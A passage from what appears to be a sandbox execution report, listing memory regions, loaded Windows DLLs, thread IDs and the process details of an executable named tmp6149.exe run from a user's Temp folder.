filename = "" Region: id = 3591 start_va = 0x40d0000 end_va = 0x414ffff entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3592 start_va = 0x164f0000 end_va = 0x168effff entry_point = 0x0 region_type = private name = "private_0x00000000164f0000" filename = "" Region: id = 3593 start_va = 0x7fef8b10000 end_va = 0x7fef8b8bfff entry_point = 0x7fef8b10000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Thread: id = 47 os_tid = 0xb00 Thread: id = 48 os_tid = 0xaf4 Thread: id = 49 os_tid = 0xae4 Thread: id = 50 os_tid = 0xae0 Thread: id = 51 os_tid = 0xadc Thread: id = 52 os_tid = 0xacc Thread: id = 53 os_tid = 0x7b8 Thread: id = 54 os_tid = 0x594 Thread: id = 55 os_tid = 0x250 Thread: id = 56 os_tid = 0x1c4 Thread: id = 57 os_tid = 0x298 Thread: id = 58 os_tid = 0x150 Thread: id = 59 os_tid = 0x7fc Thread: id = 60 os_tid = 0x7f4 Thread: id = 61 os_tid = 0x7f0 Thread: id = 62 os_tid = 0x7e4 Thread: id = 63 os_tid = 0x790 Thread: id = 64 os_tid = 0x774 Thread: id = 65 os_tid = 0x75c Thread: id = 66 os_tid = 0x750 Thread: id = 67 os_tid = 0x74c Thread: id = 68 os_tid = 0x738 Thread: id = 69 os_tid = 0x71c Thread: id = 70 os_tid = 0x718 Thread: id = 71 os_tid = 0x70c Thread: id = 72 os_tid = 0x6ec Thread: id = 73 os_tid = 0x4c0 Thread: id = 74 os_tid = 0x498 Thread: id = 75 os_tid = 0x494 Thread: id = 76 os_tid = 0x484 Thread: id = 77 os_tid = 0x480 Thread: id = 78 os_tid = 0x474 Thread: id = 79 os_tid = 0x1cc Thread: id = 80 os_tid = 0x120 Thread: id = 81 os_tid = 0x3fc Thread: id = 82 os_tid = 0x3f0 Thread: id = 83 os_tid = 0x3e4 Thread: id = 84 os_tid = 0x398 Thread: id = 85 os_tid = 0x394 Thread: id = 86 os_tid = 0x390 Thread: id = 87 os_tid = 0x384 Thread: id = 88 os_tid = 0x378 Thread: id = 89 os_tid = 0x370 Thread: id = 90 os_tid = 0xb68 Thread: id = 91 os_tid = 0xbac Thread: id = 92 os_tid = 0xbb0 Thread: id = 93 os_tid = 0xbb4 Thread: id = 94 os_tid = 0xbb8 Thread: id = 95 os_tid = 0xbbc Thread: id = 96 os_tid = 0xbc0 Thread: id = 97 os_tid = 0xbc4 Thread: id = 98 os_tid = 0xbc8 Thread: id = 99 os_tid = 0xbe8 Thread: id = 100 os_tid = 0xbec Thread: id = 101 os_tid = 0xbf0 Thread: id = 102 os_tid = 0xbf4 Thread: id = 120 os_tid = 0x85c Thread: id = 123 os_tid = 0x858 Thread: id = 162 os_tid = 0x99c Thread: id = 163 os_tid = 0xac4 Thread: id = 164 os_tid = 0xabc Thread: id = 165 os_tid = 0xac0 Thread: id = 166 os_tid = 0xad4 Thread: id = 167 os_tid = 0xad0 Thread: id = 178 os_tid = 0xb98 Thread: id = 294 os_tid = 0x79c Thread: id = 301 os_tid = 0xbfc Thread: id = 347 os_tid = 0xabc Thread: id = 348 os_tid = 0x960 Thread: id = 357 os_tid = 0x9cc Thread: id = 358 os_tid = 0x998 Process: id = "7" image_name = "tmp6149.exe" filename = "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe" page_root = "0x7794000" os_pid = "0x698" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xa80" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1445 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1446 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1447 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1448 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1449 start_va = 0x90000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1450 start_va = 0x290000 end_va = 0x293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1451 start_va = 0x400000 end_va = 0x487fff entry_point = 0x400000 region_type = mapped_file name = "tmp6149.exe" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe") Region: id = 1452 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1453 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1454 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1455 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1456 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1457 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1458 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1459 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1460 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1461 start_va = 0x340000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1462 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1463 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1464 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1465 start_va = 0x530000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1466 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1467 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1468 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1469 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1470 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1471 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1472 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1473 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1474 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1475 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1476 start_va = 0x310000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1477 start_va = 0x630000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1478 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1479 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1480 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1481 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1482 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1483 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1484 start_va = 0x75520000 end_va = 0x75535fff entry_point = 0x75520000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1485 start_va = 0x3c0000 end_va = 0x3fbfff entry_point = 0x3c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1486 start_va = 0x3c0000 end_va = 0x3fbfff entry_point = 0x3c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1487 start_va = 0x3c0000 end_va = 0x3fbfff entry_point = 0x3c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1488 start_va = 0x3c0000 end_va = 0x3fbfff entry_point = 0x3c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1489 start_va = 0x3c0000 end_va = 0x3fbfff entry_point = 0x3c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1490 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1491 start_va = 0x730000 end_va = 0x9fefff entry_point = 0x730000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1492 start_va = 0x754c0000 end_va = 0x754d6fff entry_point = 0x754c0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1493 start_va = 0x75950000 end_va = 0x7595afff entry_point = 0x75950000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1494 start_va = 0x76330000 end_va = 0x7644cfff entry_point = 0x76330000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1495 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1496 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1497 start_va = 0xa00000 end_va = 0xdf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1498 start_va = 0x76330000 end_va = 0x7644cfff entry_point = 0x76330000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1499 start_va = 0x77800000 end_va = 0x7780bfff entry_point = 0x77800000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1500 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1501 start_va = 0xe00000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1502 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1503 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1504 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1505 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1506 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1507 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1508 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1509 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1510 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1511 start_va = 0x3e0000 end_va = 0x3fdfff entry_point = 0x3e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1512 start_va = 0x1000000 end_va = 0x1187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001000000" filename = "" Region: id = 1513 start_va = 0x3e0000 end_va = 0x3fdfff entry_point = 0x3e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1514 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1515 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1516 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1517 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1518 start_va = 0x1190000 end_va = 0x1310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 1519 start_va = 0x1320000 end_va = 0x271ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001320000" filename = "" Region: id = 1520 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1536 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1537 start_va = 0x2720000 end_va = 0x2b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 1538 start_va = 0x2b30000 end_va = 0x2f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b30000" filename = "" Region: id = 1566 start_va = 0x2f40000 end_va = 0x2f51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f40000" filename = "" Region: id = 1567 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1568 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1569 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1570 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1571 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1572 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1573 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1574 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1575 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1576 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1577 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1578 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1579 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1580 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1581 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1582 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1583 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1584 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1585 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1586 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1587 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1588 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1589 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1590 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1591 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1592 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1593 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1594 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1595 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1596 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1597 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1598 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1599 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1600 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1601 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1602 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1603 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1604 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1605 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1606 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1607 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1608 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1609 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1610 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1611 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1612 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1613 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1614 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1615 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1616 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1617 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1618 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1619 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1620 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1621 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1622 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1623 start_va = 0x2720000 end_va = 0x2b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 1624 start_va = 0x2b30000 end_va = 0x2f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b30000" filename = "" Region: id = 1625 start_va = 0x2f40000 end_va = 0x2f51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f40000" filename = "" Region: id = 1626 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1627 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1628 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1629 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1630 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1631 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1632 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1633 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1634 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1635 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1636 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1637 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1638 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1639 start_va = 0x510000 end_va = 0x521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1640 start_va = 